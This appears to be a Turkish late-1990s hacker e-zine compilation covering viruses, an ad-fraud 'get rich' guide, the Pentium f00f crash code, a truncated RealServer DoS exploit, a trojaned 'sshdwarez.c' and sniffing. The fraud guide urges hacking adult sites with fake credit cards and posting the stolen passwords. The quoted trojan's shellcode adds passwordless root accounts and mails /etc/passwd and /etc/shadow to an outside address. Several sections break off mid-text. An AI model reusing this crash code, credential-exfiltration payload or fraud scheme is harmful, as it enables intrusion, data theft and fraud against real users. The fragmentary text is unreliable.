1. Virüsler
Virüs nedir ? Trojan (Truva atı) nedir ? Virüsler, kendi kodlarını başka programlara veya program niteliği olan dosyalara bulaştırabilme özelliği olan (kendi kodunu kopyalayabilen) bilgisayar programlarıdır.Bulaştıkları bilgisayarda genelde hızlı bir şekilde yayılırlar.Belli bir amaca yönelik olarak yazılmış, zarar vermeye yönelik olabilecekleri gibi eğlence amacıyla da yazılmış olabilirler. Truva atları, virüslerden oldukça farklı bir yapıya sahiptir.Asla başka programlara bulaşmazlar.Belli olaylara bağlı olarak tetiklenen bir rutindirler.Kendilerini kopyalayamadıkları için bazı programların içine bilinçli olarak yerleştirilirler.Trojanlar, ilgi çeken, utility gibi programların içine yerleştirilirler.Trojan kodu, trojanın içine gizlendiği programın yazarı tarafından yazılmış olabileceği gibi sonradan da programa eklenmiş olabilir.Trojanlar aslında kopya koruma amacıyla hazırlanırlar. Virüsler çoğunlukla Assembly gibi düşük seviyeli bir programlama dili ile yazılırlar.Bunun asıl 2 sebebi vardır. 1- Assembly'ın çok güçlü bir dil olması:ViRÜSLER NELERi YAPABiLiR, NELERi YAPAMAZ ?
Virüslerin neleri yapıp neleri yapamayacakları konusu en çok ilgi çeken, üzerinde en çok konuşulan konulardan birisidir. Çünkü bir virüs, yaptıklarıyla anılır ve bilinir.Virüserin en çok korkulan etkilerin başında gelenler şunlardır: BİR VİRÜS BİLGİSAYARDAN SİLİNDİKTEN SONRA KENDİ KENDİNE TEKRAR ORTAYA ÇIKIP ETKİNLEŞEBİLİR Mİ ? Hayır.Bir virüsün temizlenmesinden sonra durduk yerde yeniden peydahlanması doğru değildir.Eğer bir antivirüs programı ile sisteminizden virüsü temizlemenize rağmen virüs tekrar ortaya çıkıyorsa 2.durum sözkonusu olabilir. 1- Antivirüs, virüsü temizleyemiyor olabilir.Amatör programcıların yazdıkları shareware olarak dağıtılan antivirüs programlarından birini kullanıyorsanız bu durumla karşılaşmanız olasıdır.Bunun pek çok sebebi olabilir.Örneğin antivirüs, virüsü başka bir virüsle karıştırıyor olabilir.İmza tarama esasına göre çalışan antivirüslerde ortaya çıkabilecek bu sorun genellikle iki virüsün birbirinin varyantı (üzerinde küçük değişiklikler yapılmış biçim) olmasından kaynaklanır.Bir veya birkaç virüsü temizlemek için hazırlanmış eski antivirüs programlarının o virüsün yeni bir varyantının temizlenmesi amacı ile kullanılması sonucu da ortaya çıkabilir.Mesela; elimizde bir programcının 4 yıl önce yazdığı xx virüsünün antivirüs programı olsun.1 yıl önce ortaya çıkan xx virüsünün bir varyantı olan xx.a gibi bir virüsü temizlemek istersek muhtemelen tarama imzaları aynı veya benzer yapıda olacağından bu tür bir sorun ile karşılaşabiliriz.Bunun sonucu olarak virüs uzunluğunun farklı oluşundan dolayı yanlış isimle bile olsa tespit edilir ancak temizlenemez.Bu durumda antivirüs kullanıcıyı yeni bir virüsle karşılaştığını belirten bir mesaj ile uyarır. 2- Bir yerlerde temizlemeyi unuttuğunuz birkaç virüslü dosyanız kalmıştır.Virüs taramalarında taramayı unuttuğunuz disketleri kullanırsanız ve disketteki programlar virüslü ise siz farkına varmadan virüs tekrar sisteminize bulaşacaktır.Virüs taraması yaparken sahip olduğunuz tüm disk ve disketleri virüs taramasından geçirin.Ancak bu şekilde virüslerden kurtulabilirsiniz. Burada belirtmek isterim ki, bu iki durumdan 2.sinin olması daha muhtemeldir.Birinci durumun gerçekleşme ihtimali çok azdır. VİRÜSLER VERİ DOSYALARINA ZARAR VEREBİLİR Mİ ? Evet, kesinlikle verebilir.Özel bir veya birkaç dosya türünü hedef alan virüsler, bu tür dosyalara silebilir veya içlerindeki veriyi değiştirebilir, dosyanın yapısını bozabilir.Örneğin yerli virüslerden Trakia.653 virüsü AutoCAD'in DXF ve DWG uzantılı dosyaları hedef almakta ve bu kütüklerin yapısını bozarak işlenemeyecek hale getirmektedir.Trakia.560 virüsü bazı dosyaları silmektedir.Ancak bu tür etkiler virüsün farkedilmesi kolaylaştıracağından pek tercih edilmezler. ViRÜSLER YAZMA-KORUMALI DiSKETLERE BULAŞABiLiR Mi ? Disketlerin yazma koruması yazılımla kontrol edilen bir sistemdir ve bu sistem aşılabilir.Ancak yazma korumasını kapatmak virüs içinde ekstra kod anlamına gelir.Eksta kod, virüsün boyunu uzatacak ve virüsün farkedilmesini kolaylaştıracaktır.Bu yüzden uygulanan bir yol değildir.Virüsler, yazma korumasını kapatmak yerine yazma korumasını kontrol edip koruma varsa bulaşmamayı tercih ederler. VİRÜSLER CMOS'A BULAŞABİLİR Mİ ? Herhangi bir virüsün CMOS alanına bulaşması mümkün değildir.Hatta imkansızdır.CMOS bellek kapasitesi üretici firmaya bağlı olarak 128 veya 256 bayttır.Bu alan virüsün ihtiyaç duyacağı belleğin çok altındadır.Kaldı ki CMOS, setup parametrelerinin saklandığı bir veri alanıdır.Ancak virüsler setup parametlerini değiştirebilirler. VİRÜSLER DONANIMA ZARAR VEREBİLİR Mİ ? Eskiden kısmen, günümüzde hayır.Eski MDA (mochrome display adapter - tekrenkli görüntü bağdaştırıcısı) ekran kartlarına bir komut serisi yollanarak MDA kartlar yakılabilir.Ancak MDA kartlar çoktan tarih olduğundan artık bunun pek önemi de yok. Eski disklerin okuma/yazma kafalarının ani hareketlerle hareket ettirilmesi sonucu diskin bozulmasını sağlamak mümkündü. Artık günümüzde ise disklerin cacheleri sayesinde bu tür hareketler disk tarafından engellenebiliyor ve disklerdeki kafalar manyetik bir esasa göre çalışıyor.Bu sayede elektrikler kesilse bile disk zarar görmeden kafalar park ediliyor. Bir de disk üzerinde bir bölgenin milyonlarca kez formatlanması durumu var.Bu işlem sonunda disk üzerindeki manyetik malzeme zarar görecek, disk okunamaz duruma gelecektir.Bu işlemin partition table üzerinde yapıldığını düşünürsek diski kaldırıp çöpe atmaktan veya disk kasasını açıp raf süsü olarak kullanmak dışında geriye pek bir şey kalmaz.Ancak hemen belirteyim ki bu formatlama işlemi oldukça uzun sürecektir.Bir virüsü diski milyonlarca kez formatlamak isterse, kullanıcı bilgisayarın kilitlendiğini düşünecek ve resetleyecektir.Sonuçta virüs amacına ulaşamamış olacaktır. Eğer Windows95/98/NT gibi bir işletim sisteminin çalıştığı bilgisayarlarda windows direkt disk erişimlerini mümkün olduğunca engellemeye çalışır. VİRÜSLER V-SAFE, VIRSCAN, GUARD GİBİ KORUMA PROGRAMLARINI ATLATABİLİR Mİ ? Yeni bir virüs veya çok iyi yazılmış bir virüs bu tür programları safdışı edebilir.Ancak koruma programları virüslü programı daha çalışmadan önce test ettiklerinden bu düşük bir ihtimaldir.Virüsler, bu tür programları aktivitelerinin rapor edilmesinin engellemek için atlatmak ister. Bu yazı gelecek ay devam edecek...2. Hacker'lar Nasıl Milyoner Olur?
Burada bazi gecen yontemleri her hacker uygulayamaz fakat bazi yontemleri uygulamak icin hacker olmaniz bile gerekmez...
Yontemleri uygulamak icin gerekli araclar:
(1)
. Guzel bir e-mail adresi :) hotmail bunun icin cok uygun.... Ayrintili bilgi icin bakiniz guzel bir e-mail adresi...1)
. Guzel bir e-mail adresi... Ben size e-mail adresi alinacak yer olarak hotmail i tavsiye ediyom... hemen iki dakika da hesabinizi aciyorlar... $imdi diyeceksiniz ki bu e-mail adresi ne ise yariycak ????First Name : Kibar
Last Name : Feyzo
Login : kibariye vs...
bunlar elin gevuruna anlamli gelir... Sakin gidip de
Firt Name :asdasdad
Last Name :asdadasd
Login : atd3169
gibi $eyler yapmayin hesabinizin omrunu azaltirsiniz...
Herneyse butun bunlari yaptiginizi ve key0s@hotmail.com gibi bir hesabiniz oldugunuzu var sayiyorum... Eger hotmail den hesap actiramadiysaniz faq@ebmesi.org den bana e-mail atinda size yardimci olayim!!!
iste gidin www.xoom.com veya www.8m.com dan bir hesap actirin butur yerler sizlere 10-20MB gibi bi yer vercektir... i$te... boylece members.xoom.com/salaksalak veya salaki.8m.com gibi bir adresiniz oldu Siz gerekli formdaki her yeri mantikli sallamaca seklinde doldurunuz... e-mail adresi olarakda hotmail den actiginiz e-mail adresini girin... onlar sifreyi ve gerekli bilgileri size ula$tircaktir...
SORU
: ben beceremedim ne yapcam ?(3)
. home peyc yapici (html editoru) evet bazi java scriptleri yazmak ve internet sayfanizi hazirlamak icin buna ihtiyac var... Eger html dilini biliyorsaniz vi veya notepad kullanin... yoksa front page kullanin...SORU :
Bu editorleri nerden bulcam ve nasil calistircam ?Evet gelelim milyoner olma olayina bakalim neler yapcaz :)))) Burdaki olaylari adim adim anlatcam....
[1]. PENCERE AC CLICK AL OLAYI!
Burda sponsor alirken dikkat edilmesi gerekenler :
2.
Adres soruyorlar... bu adreslere posta ile cekleri gonderiyor ondan adresler de dogru yazin mumkunde adres olarak size ait olmayan ama gelen ceklerin size ulasabilcegi bir posta kutusu adresi verin... (NE MUTLU GIZLILIK OLAYI >:) )3.
e-mail adresi olarakda tabeeee hotmail den aldigin adresi ver...$imdi eger sponsorunuz e-mail adresinize banner ve link ile ilgili bilgileri ve sifrenizi gondericek...
Evet ben sponsor olarak sizlere cyberthrill diyom... cunku sayfanin icerigine bakmadan her sayfaya sponsorluk veriyor bu arada belirteyim ki benim 800$ kaldi... Ilk seferler cekleri gonderdiler ama sonradan gondermemeye basladilar...
$imdi e-mail adresinize bilgiler geldikden sonra guzel bir sayfa hazirlayin kendinize!!!Milletin ilgisini cekicek bir seyler koyun!!!
SORU :
Ne gibi ilgi ceken $eyler ???1.
ADULT en ba$ta gidin adult siteleri hack edip kendinize accound acin.. (sahte kredi karti rulaz) ondan sonra bu sifreleri sayfanizda yayinlayin...<script LANGUAGE="javascript">
<!--
window.open(
buradaki olay.. adam sayfaniza gelince baska bir pencere aciliyor ve sponsorunuz sayfasina gidiyor... iste buda size para kazandiriyor...
NOT HEMIDE ONEMLI :
eger pennyweb de bunu yaparsaniz bi ise yaramaz...- True Story -
[2]. BaBalara Gore i$...
[3]. En cool way...
Bo dokuman kEY0S tarafindan hazirlanmi$tir...
all rights reserve edilmi$tir...
3. Intel "f00f" Pentium Bug
Açıklama :
Bu bug tanımlanamayan bir yöntem ile Intel Pentium CPU ları çökertir.Yapan :
Bu bug ı bulan kişi bilinmiyor. Bug anonymous remailer ile dağıtılmıştır.Sistem :
Bug Intel Pentium CPU kullanan bütün sistemlerde çalışır. DOS, Windows Linux, SCO, Solaris...Bu hata bütün Pentium işlemciler için çok ciddi bir tehlike unsurudur. Aşağıdaki kod pentium işlemci ile çalışan bir çok makinayı çökertebilir. Makinanın MMX olup olmaması, cpu hızı ve kullanılan işletim sistemi önemli değil! Bu bug bazen makinayi resetlerken bazen de donduruyor.
char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
main ()
{
void (*f)() = x;
f();
}
4. D.O.S Attack (Real Player Server'lar İçin)
DOS against realvideoserver by Progressive Networks
Açıklama :
Bu da bir başka DOS(denial of service) atak yöntemi.Bu hata pnserver hatası gibi gözüksede, daha farklı çalışıyor. Telnet client den serveri çökerten 6 karakter göndererek tamponu dolduruyor. Çalışan exploit aşağıda :
/*
* pnserver exploit [1/15/98]
*
* Crash's Progressive Networks Real Video Server [
5. Uyarılar
1.
Bir kaç gün önce bir adam bazı mailing listlere,mIRC(5.41) de ki bugdan bahseden bir mail atmıştı.Söylediğine göre bu scripti çalıştıran kişi,mIRC kullanan kişinin ctcp sinde bulunan açık sayesinde op oluyordu.2.
İkinci uyarım ise,şu son günlerde bayağı tartışılan bir konu üzerine...Biliyorsunuz rootshell yaklaşık 10-15 gün önce hacklendi.Hala nasıl hacklendiği tartışılıyor. Gerçi yapılan analizlerde bug ın ssh(Security shell)de olduğu açıklandı.Fakat yine de ssh nin yaratıcısı Tatu Ylonen,avaz avaz bug yok,diye bağırıyor. Yine geçenlerde bir kelek bir çok mailing liste "sshnin exploiti" başlıklı bir c yolladı. Bu dosyanın ismi "sshdwarezc yada sshdexp.c".Bu iki dosyayı görürseniz falan sakın alayım, çalıştırayım demeyin.
Aslında kont
echo b4b0::0:0::/:>>/etc/passwd;echo babo::10:10::/: >> /etc/passwd ; (cat /etc/passwd
/etc/shadow ;/sbin/ifconfig)|mail kitandjp@hotmail.com /bin/sh
Eğer bu programı sisteminizde çalıştırdıysanız."/etc/passwd" e yeni bir şeyin eklenip eklenmediğini aşşağıdaki komutlar ile görebilirsiniz.
grep babo: /etc/passwd
grep b4b0: /etc/passwd
İlgilenen arkadaşlar için aşşağıya kodu koyuyorum:
-- sshdwarez.c --
/************************************************************************/
/* root exploit for Linux 2.0.* and possible 2.1.* SSHD 1.5-1.2.23 */
/* On some weird systems this causes a segfault */
/* If it doesnt work change the offset (usually between 0 and 5000) */
/* (try increments of 2.......) */
/* TO RUN: */
/* (./sshdwarez ; cat) | nc victim 22 */
/* */
/* forever yours: st4n@zdnetmail.com */
/************************************************************************/
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#define OFFSET 146
#define NOP 0x90
char shellcode[] =
"\xbc\x84\x04\x08\x65\x63\x68\x6f\x20\x62\x34\x62\x30\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x3e\x3e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77"
"\x64\x3b\x65\x63\x68\x6f\x20\x62\x61\x62\x6f\x3a\x3a\x31\x30\x3a\x31"
"\x30\x3a\x3a\x2f\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"
"\x73\x77\x64\x20\x3b\x20\x28\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"
"\x20\x3b\x2f\x73\x62\x69\x6e\x2f\x69\x66\x63\x6f\x6e\x66\x69\x67\x29"
"\x7c\x6d\x61\x69\x6c\x20\x6b\x69\x74\x61\x6e\x64\x6a\x70\x40\x68\x6f"
"\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x00\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
int fetch(int *w){ /* push and return something from the stack */
char stack[4096];
int (*push)();
memcpy((int*)&push,w,sizeof(int));
memcpy(stack,(char*)w+4,OFFSET-5);
push(stack);
return *w;
}
int i;
char *p;
main(int argc,char**argv)
{
char s[1024];
char ssh[] = "\x8c\xfd\xff\xbf\x48\x9b"; /* starts ssh session */
strcpy(argv[0],"vi ");
if (getuid())
{
system("/bin/echo this program uses priveledged ports. "
"run as root.");
return -1;
}
write(1,ssh,sizeof(ssh));
for (i=0;i<500;i++)
s[i]=NOP;
p=&s[i];
memcpy(p,&shellcode[OFFSET],sizeof(shellcode)-OFFSET);
/* most [linux] systems keep libc functions in the same place */
i=(int)system;memcpy(&shellcode,&i,sizeof(int));
write(1,s,500+(sizeof(shellcode)-OFFSET));
fetch((int*)&shellcode);
usleep(1000000);
return 0;
}
Bilgisayarınızda bir programı çalıştırırken çok dikkatli olun.Hele hele bu programı size Efnetli bir IRC lamerı vermişse....
6. Sniffing Nedir?
Sniffer nedir ve nasıl çalışır?
Birden fazla bilgisayarı,birbirine bağlayarak aralarında bir paylaşım kurmak masraflı bir iştir. Paylaşım,bir bilgisayardaki bilgilerin,başka bir bilgisayara aktarılması olarak açıklanabilir. Bu iki bilgisayar arasında yapılan bilgi alış-veriş ini yakalamaya "sniffing" denilir. Bir kaç bilgisayarın,bir ağ üzerinde birbirleriyle paylaşıma açık olarak bağlanılmasında kullanılan en popüler yol
"ethernet" dir.Ethernet protokolü bir bilgi paketini aynı devreler üzerindeki tüm bilgisayarlara yollayarak çalışır.Gönderilen paketin başlığında,paketin gideceği bilgisayarın adresi yazar.Sadece bu paketteki adres ile adresi tutan makine bu bilgileri alabilir.Her paketi kabul eden bir makine,paket başlığındaki adrese aldırmayan makine,çok karışık bir hal alacaktır. Bu karışıklık sayesinde,sniffer işini görecektir.Normal bir networkte,account ve şifreler ,ethernet üzerinde düzgün bir yazıyla(encrypt edilmemiş) gidip gelirler.Bir ziyaretçi,ethernet üzerindeki herhangi bir makineden root yetkisi elde ederse, sistemi sniffleyerek ağ üzerinde ki diğer makinelerde de çok rahat "root" elde edebilir.
- Snifferları nereden bulabilirim?
Sniffing,hackerlar tarafından kullanılan en önemli hack yöntemlerinden biridir.Sniffer denilen bu programları,netde bir çok yerden bulabilirsiniz.Fakat hepsi,gerçekten çalışırmı bilmiyorum. Onun için çalıştığına şahit oldugum bir sniffer dan bahsedicegim.Esniff.c!SunOS da çalışmak i
çin dizayn edilmiş,küçük boyutta ve sistemde ki tüm telnet,ftp ve rlogin sezonlarının ilk 300 byte ını yakalayabilen bir program.Esniff.c,ilk kez *Phrack* de ünlendi.Bu programı bir çok FTP server da bulabilirsiniz.(coombs.anu.edu.au:/pub/net/log.)Ünlenmi
ş bir kaç tane Snifferıda söylemeden geçemiyeceğim,- Sistemimizde sniffer çalıştığını nasıl anlarız?
Bir sistemde sniffer çalıştıgını remote olarak anlamamız mümkün değildir. Sniffer çalışan makina,her paketi kabul eder ve çok karmaşık bir hal alır.Bir çok Unix tabanlı İşletim sisteminde,sistemde sniffer olup olmadığını anlamanın yolları vardır. SunOS,BSD,Linux ve diğer bir çok Unix tabanlı OS larda bir komut b
ulunur.."ifconfig -a"
Bu komut,tüm arayüzleri kontrol edecek ve sistem de bir abukluk varsa size bildirecektir.Ama bazı OS larda bu komutu çalıştırmak için bazı device adresleri falan girmek gerekir (IRIX gibi..)Onun için başka bir komut daha söyleyeyim.(Aşağıdaki örnek tamamen hayalidir.)
# netstat -r
# ifconfig virgo
Ultrixde ise,sistemde sniffer çalışıp calışmadığını "pfstat ve pfconfig" komutlarını kullanarak öğrenebiliriz.
pfconfig size kimlerin sniffer kullanıp kullanamayacağını ayarlama olanağı verir. pfstat ise size sistem de ki abukluklukları sıralar.
Bundan başka,üzülerek söylüyorum ki Irix, Solaris ve SCO da sniffer olup olmadığını algılamak biraz zordur.Yani heran bir hacker kardeş içerde snifferları depolamış olabilir. Bir başka yol ise,snifferların log dosya
- Encryption
Eğer yukarıdaki yollara güvenmiyorsanız,yapabileceğiniz en güzel şeylerden biride paketleri encryptlemek olabilir.Hacker dostumuz,paketleri yakalayabilir ama gördüklerinden hiç birşey anlamaz.
Bunun için 1-2 program ve adreslerini vereyim,
* deslogin
coast.cs.purdue.edu:/pub/tools/unix/desloginUmarım sniff denilen olayı kavramanıza yardımcı olmuşumdur.
Görüşmek üzere,
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6
mQCNAzYxtv0AAAEEAOZM+5YaCE9IJb29f1v9NhVqX2LD++8ed0MvwGgYurgQKUR1
dY6Ehn7GP8IUiE85ZhXTFgqia+JB+V1RTXFZlQJlZiR9FVRD2TWBND6zXFNwB+K2
aSL352d4NXY/Ms9a+pgyiVH9/i7njB722OJrptrCI/cp15lgG50XjFsM9rBNAAUR
tB5PbnVyIEd1bmR1eiA8a2FpQGxpbnV4Lm9yZy50cj4=
=KE54
-----END PGP PUBLIC KEY BLOCK-----
7. Caller ID !!!
CityBank Nasıl Hack Edildi Hacker misin ?